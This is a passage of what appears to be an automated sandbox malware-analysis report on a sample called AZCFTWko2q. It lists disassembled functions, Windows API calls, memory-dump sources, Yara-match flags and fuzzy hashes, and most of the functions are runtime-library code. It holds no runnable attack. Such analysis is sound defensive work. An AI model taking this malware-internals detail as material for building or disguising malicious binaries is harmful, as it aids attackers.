                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A412B725003196FCB20AFB9DC49EBBB778EB88714F50566EF905D7280EA34AD41CB58
                                                                                                                                                                                                                                                                                      Function 004351C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                                                                                      • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                                                                                      • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                                                                                      • Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                                                                                                                                                                                                                                                      • Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE
                                                                                                                                                                                                                                                                                      Function 024EED47 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                                                                                                                                                                                                                                                      • Instruction ID: 4ae49a95b7c64ba767fb8a5f99d323f3de115220bcbad79950cb378f6a254cf8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28022D71E002199BEF14CFA9C9906AEF7F1EF88325F15826AD91AE7340D731A945CB80
                                                                                                                                                                                                                                                                                      Function 024C2605 Relevance: 3.1, APIs: 2, Instructions: 125nativewindowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 024C262C
                                                                                                                                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 024C27CA
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageNtdllPostProc_QuitWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4264772764-0
                                                                                                                                                                                                                                                                                      • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                                                                      • Instruction ID: 6ad3a08127dbb01a78909def9183aaaebec7daf78f3187a793ccfc0e069aa659
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C412D25A6434095E730EFA5BC45B2633B0FF64B26F10252FD528CB2B2E3A28540C75E
                                                                                                                                                                                                                                                                                      Function 024F6F26 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,024F6F21,?,?,00000008,?,?,024FF3E2,00000000), ref: 024F7153
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                                                                      • Instruction ID: 6366081ffb8182c296b9658f943e77cf32c1c022f0677522e99c37241884c123
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0B16D312106089FD755CF28C486B66BBE1FF85368F258659E99ACF3A1C339D992CF40
                                                                                                                                                                                                                                                                                      Function 00436CBF Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                                                                      • Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44
                                                                                                                                                                                                                                                                                      Function 024FB8AC Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: _free.LIBCMT ref: 024F21A0
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21AD
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024FB900
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2955987475-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                                                                                                                                                                                                                      • Instruction ID: 2c75188b5ff96f9cc0cf981139fa8a88b1d74d476f1b10bfc2653860193751ab
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27218032A5020AABDF649E25DC41FBB77ADEB8A318F10017FEE01D6250EB79D945CB50
                                                                                                                                                                                                                                                                                      Function 0043B645 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2955987475-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
                                                                                                                                                                                                                                                                                      • Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99
                                                                                                                                                                                                                                                                                      Function 024FB534 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,024F0A1C,?,024FBC89,00000000,?,?,?), ref: 024FB5A6
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                                      • Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                                                                                                                                                                                                                                                      • Instruction ID: d707b3e806164541dfa077f739ff801c7fc3bc8b35c1c4102fec721b69519838
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9311E93A2007059FDB189F39C8A167BBB92FFC575CB15442DDA4687B40D775B542CB40
                                                                                                                                                                                                                                                                                      Function 0043B2CD Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                                                                                                                                                                                                                                                      • Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784
                                                                                                                                                                                                                                                                                      Function 024FBADC Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,024FB87A,00000000,00000000,?), ref: 024FBB08
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$InfoLocale_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 787680540-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                                                                                                                                                                                                      • Instruction ID: 126c4d58b6a73fb949c0d3614656510d35582df9a768315e6c31bf6f3c62d30d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60F0F932A00115ABDB689E25CC45BBB7758EB8671CF04046ADF05A3644EB70BE42C6D0
                                                                                                                                                                                                                                                                                      Function 0043B875 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$InfoLocale_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 787680540-0
                                                                                                                                                                                                                                                                                      • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                                                                                                                                                                                                      • Instruction ID: 37b951b57323e1638715454beaabcd8ff4bbdb448c8d666509202632d17d74d0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72F0F932910115BFDB2C6A6588057BB776CEF44764F15542FEE05A3280EB39FE4287D8
                                                                                                                                                                                                                                                                                      Function 024FB8A3 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: _free.LIBCMT ref: 024F21A0
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21AD
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024FB900
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2955987475-0
                                                                                                                                                                                                                                                                                      • Opcode ID: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
                                                                                                                                                                                                                                                                                      • Instruction ID: cb97f10e8bbf6354b7b7273f081b0fbefcf6a39b6ea0ca51c015fea75aa770f0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84012632A551059BDB14AF34DD40EBA33A9DF4A311B0441BFEF02DB281DA759D048B54
                                                                                                                                                                                                                                                                                      Function 024FB5CF Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,024F0A1C,?,024FBC4D,024F0A1C,?,?,?,?,?,024F0A1C,?,?), ref: 024FB61B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                                      • Opcode ID: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                                                                                                                                                                                                                                                      • Instruction ID: c65b97290dd3b3519fff1fc5984bec49759590e777e402ff64cfcab3d53944b3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0F0AF362007045FEB245F39DC81B6A7B95EB86B6CF15442EEB058B650D7B198028A44
                                                                                                                                                                                                                                                                                      Function 0043B368 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                                      • Opcode ID: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                                                                                                                                                                                                                                                      • Instruction ID: e409c1f6f572afb8e53c6bef185f66c51efc5fed4ad0f11af6fa15d84cefb54f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84F022362007045FDB159F3ADC91B6A7B90EF84328F15442EFE028B680D7B5AC028684
                                                                                                                                                                                                                                                                                      Function 024F5427 Relevance: 1.5, APIs: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,024F047A,?,00000004), ref: 024F547A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                                                                                                                                                                                                      • Instruction ID: 54da1688a597f168057d7d3f3419851e5cd8debd37b56572a07c095bfce91af3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96F02B31680318BFDB015F51CC01F6E7B66EF44F12F50411AFD0566290DB718D20AACA
                                                                                                                                                                                                                                                                                      Function 024F5034 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 024EE654: RtlEnterCriticalSection.NTDLL(02070DAF), ref: 024EE663
                                                                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 024F506C
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1272433827-0
